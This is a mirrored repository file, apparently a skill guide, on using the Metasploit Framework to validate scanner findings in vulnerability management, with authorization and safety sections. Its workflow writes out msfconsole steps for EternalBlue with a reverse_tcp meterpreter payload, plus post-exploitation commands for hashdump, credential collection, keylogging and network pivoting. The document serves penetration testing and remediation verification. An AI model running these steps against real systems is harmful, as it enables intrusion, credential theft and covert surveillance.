mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-07-14 03:15:16 +03:00
cb8d79e068
- Add validated mitre_attack frontmatter to all 754 skills (286 distinct techniques), verified against MITRE ATT&CK v19.1 via the official mitreattack-python library: 0 revoked, deprecated, or invalid IDs - Curate precise per-skill technique IDs for forensics, malware-analysis, threat-intel, and red-team skills (e.g. DCSync -> T1003.006, Kerberoasting -> T1558.003, Pass-the-Ticket -> T1550.003) - Reconcile v19.1 tactic restructuring: Defense Evasion split into Stealth (TA0005) and Defense Impairment (TA0112); revoked T1562.* family and T1070.001/.002 remapped to active equivalents (T1685.*) - Normalize word-split tags across 35 skills (remove filename-derived stopword tags, add semantic cybersecurity tags) - Add api-reference.md for 3 skills that were missing it - Update README ATT&CK section with accurate v19.1 tactic distribution
216 lines
7.1 KiB
Markdown
216 lines
7.1 KiB
Markdown
---
|
|
name: exploiting-vulnerabilities-with-metasploit-framework
|
|
description: The Metasploit Framework is the world's most widely used penetration
|
|
testing platform, maintained by Rapid7. It contains over 2,300 exploits, 1,200 auxiliary
|
|
modules, and 400 post-exploitation modules
|
|
domain: cybersecurity
|
|
subdomain: vulnerability-management
|
|
tags:
|
|
- vulnerability-management
|
|
- cve
|
|
- metasploit
|
|
- exploitation
|
|
- penetration-testing
|
|
- risk
|
|
version: '1.0'
|
|
author: mahipal
|
|
license: Apache-2.0
|
|
nist_csf:
|
|
- ID.RA-01
|
|
- ID.RA-02
|
|
- ID.IM-02
|
|
- ID.RA-06
|
|
mitre_attack:
|
|
- T1190
|
|
- T1203
|
|
- T1068
|
|
---
|
|
# Exploiting Vulnerabilities with Metasploit Framework
|
|
|
|
## Overview
|
|
The Metasploit Framework is the world's most widely used penetration testing platform, maintained by Rapid7. It contains over 2,300 exploits, 1,200 auxiliary modules, and 400 post-exploitation modules. Within vulnerability management, Metasploit serves as a validation tool to confirm that identified vulnerabilities are actually exploitable, enabling risk-based prioritization and demonstrating real-world impact to stakeholders.
|
|
|
|
|
|
## When to Use
|
|
|
|
- When performing authorized security testing that involves exploiting vulnerabilities with metasploit framework
|
|
- When analyzing malware samples or attack artifacts in a controlled environment
|
|
- When conducting red team exercises or penetration testing engagements
|
|
- When building detection capabilities based on offensive technique understanding
|
|
|
|
## Prerequisites
|
|
- Metasploit Framework installed (Kali Linux or standalone)
|
|
- PostgreSQL database for session/credential management
|
|
- Written authorization and rules of engagement for testing
|
|
- Isolated test environment or approved production testing window
|
|
- Understanding of networking, protocols, and exploitation concepts
|
|
|
|
## Core Concepts
|
|
|
|
### Metasploit Architecture
|
|
- **msfconsole**: Primary interactive command-line interface
|
|
- **Exploits**: Modules that leverage vulnerabilities to gain access
|
|
- **Payloads**: Code executed on the target after successful exploitation
|
|
- **Auxiliary**: Scanning, fuzzing, and information gathering modules
|
|
- **Post-Exploitation**: Modules for privilege escalation, persistence, pivoting
|
|
- **Encoders**: Payload encoding to evade signature-based detection
|
|
- **Nops**: No-operation generators for payload alignment
|
|
|
|
### Exploitation Workflow in Vulnerability Management
|
|
Unlike offensive red teaming, vulnerability management uses Metasploit to:
|
|
1. **Validate** scanner findings (confirm exploitability)
|
|
2. **Demonstrate** risk to business stakeholders
|
|
3. **Prioritize** remediation based on proven exploitation paths
|
|
4. **Verify** patches by confirming exploits no longer succeed
|
|
|
|
## Workflow
|
|
|
|
### Step 1: Initialize Metasploit Environment
|
|
```bash
|
|
# Start PostgreSQL and initialize database
|
|
sudo systemctl start postgresql
|
|
sudo msfdb init
|
|
|
|
# Launch msfconsole
|
|
msfconsole -q
|
|
|
|
# Verify database connection
|
|
msf6> db_status
|
|
msf6> workspace -a vuln_validation_2025
|
|
|
|
# Import vulnerability scan results
|
|
msf6> db_import /path/to/nessus_scan.nessus
|
|
msf6> hosts
|
|
msf6> vulns
|
|
```
|
|
|
|
### Step 2: Validate Specific Vulnerabilities
|
|
```bash
|
|
# Example: Validate MS17-010 (EternalBlue) from scan findings
|
|
msf6> search type:exploit name:ms17_010
|
|
msf6> use exploit/windows/smb/ms17_010_eternalblue
|
|
msf6> show options
|
|
msf6> set RHOSTS 192.168.1.100
|
|
msf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp
|
|
msf6> set LHOST 192.168.1.50
|
|
msf6> set LPORT 4444
|
|
|
|
# Use check command first (non-exploitative validation)
|
|
msf6> check
|
|
# [+] 192.168.1.100:445 - Host is likely VULNERABLE to MS17-010!
|
|
|
|
# Only exploit if check confirms vulnerability and authorized
|
|
msf6> exploit
|
|
|
|
# Example: Validate Apache Struts RCE (CVE-2017-5638)
|
|
msf6> use exploit/multi/http/struts2_content_type_ognl
|
|
msf6> set RHOSTS target.example.com
|
|
msf6> set RPORT 8080
|
|
msf6> set TARGETURI /showcase.action
|
|
msf6> check
|
|
|
|
# Example: Validate Log4Shell (CVE-2021-44228)
|
|
msf6> use exploit/multi/http/log4shell_header_injection
|
|
msf6> set RHOSTS target.example.com
|
|
msf6> set HTTP_HEADER X-Api-Version
|
|
msf6> check
|
|
```
|
|
|
|
### Step 3: Auxiliary Scanning for Validation
|
|
```bash
|
|
# SMB vulnerability scanning
|
|
msf6> use auxiliary/scanner/smb/smb_ms17_010
|
|
msf6> set RHOSTS 192.168.1.0/24
|
|
msf6> set THREADS 10
|
|
msf6> run
|
|
|
|
# SSL/TLS vulnerability checks
|
|
msf6> use auxiliary/scanner/ssl/openssl_heartbleed
|
|
msf6> set RHOSTS target.example.com
|
|
msf6> run
|
|
|
|
# HTTP vulnerability validation
|
|
msf6> use auxiliary/scanner/http/dir_listing
|
|
msf6> set RHOSTS target.example.com
|
|
msf6> run
|
|
|
|
# Database authentication testing
|
|
msf6> use auxiliary/scanner/mssql/mssql_login
|
|
msf6> set RHOSTS db-server.corp.local
|
|
msf6> set USERNAME sa
|
|
msf6> set PASSWORD ""
|
|
msf6> run
|
|
```
|
|
|
|
### Step 4: Post-Exploitation Impact Assessment
|
|
```bash
|
|
# After successful exploitation, demonstrate impact
|
|
meterpreter> getuid
|
|
meterpreter> sysinfo
|
|
meterpreter> hashdump
|
|
meterpreter> run post/multi/gather/env
|
|
meterpreter> run post/windows/gather/enum_patches
|
|
meterpreter> run post/windows/gather/credentials/credential_collector
|
|
|
|
# Network pivoting demonstration
|
|
meterpreter> run post/multi/manage/autoroute
|
|
meterpreter> run auxiliary/server/socks_proxy
|
|
|
|
# Screenshot for evidence
|
|
meterpreter> screenshot
|
|
meterpreter> keyscan_start
|
|
```
|
|
|
|
### Step 5: Document and Report Findings
|
|
```bash
|
|
# Export exploitation evidence
|
|
msf6> vulns -o /tmp/validated_vulns.csv
|
|
msf6> hosts -o /tmp/compromised_hosts.csv
|
|
msf6> creds -o /tmp/captured_creds.csv
|
|
msf6> loot -o /tmp/captured_loot.csv
|
|
|
|
# Generate report from database
|
|
msf6> db_export -f xml /tmp/msf_report.xml
|
|
```
|
|
|
|
### Step 6: Post-Patch Verification
|
|
```bash
|
|
# After remediation, verify exploit no longer works
|
|
msf6> use exploit/windows/smb/ms17_010_eternalblue
|
|
msf6> set RHOSTS 192.168.1.100
|
|
msf6> check
|
|
# [-] 192.168.1.100:445 - Host does NOT appear vulnerable.
|
|
# Patch verified successfully
|
|
```
|
|
|
|
## Safety Controls
|
|
1. **Always use `check` command** before `exploit` when available
|
|
2. **Set AutoRunScript** for clean session management
|
|
3. **Use EXITFUNC=thread** to prevent crashing target services
|
|
4. **Limit payload capabilities** to minimum needed for validation
|
|
5. **Document every action** for audit trail and evidence
|
|
6. **Use workspace isolation** per engagement
|
|
7. **Never run Metasploit against unauthorized targets**
|
|
|
|
## Best Practices
|
|
1. Start with vulnerability check modules before exploitation
|
|
2. Use Metasploit to validate top-priority scanner findings only
|
|
3. Coordinate with system owners for testing windows
|
|
4. Maintain detailed logs of all exploitation attempts
|
|
5. Clean up all artifacts and sessions after testing
|
|
6. Use results to create compelling risk narratives for stakeholders
|
|
7. Integrate Metasploit validation into vulnerability management workflow
|
|
|
|
## Common Pitfalls
|
|
- Exploiting without written authorization (legal liability)
|
|
- Using exploitation on production systems without coordination
|
|
- Not cleaning up Meterpreter sessions and artifacts
|
|
- Confusing vulnerability validation with penetration testing scope
|
|
- Using outdated Metasploit modules against patched systems
|
|
- Failing to document exploitation evidence for remediation teams
|
|
|
|
## Related Skills
|
|
- performing-red-team-validated-vulnerability-testing
|
|
- scanning-infrastructure-with-nessus
|
|
- performing-network-vulnerability-assessment
|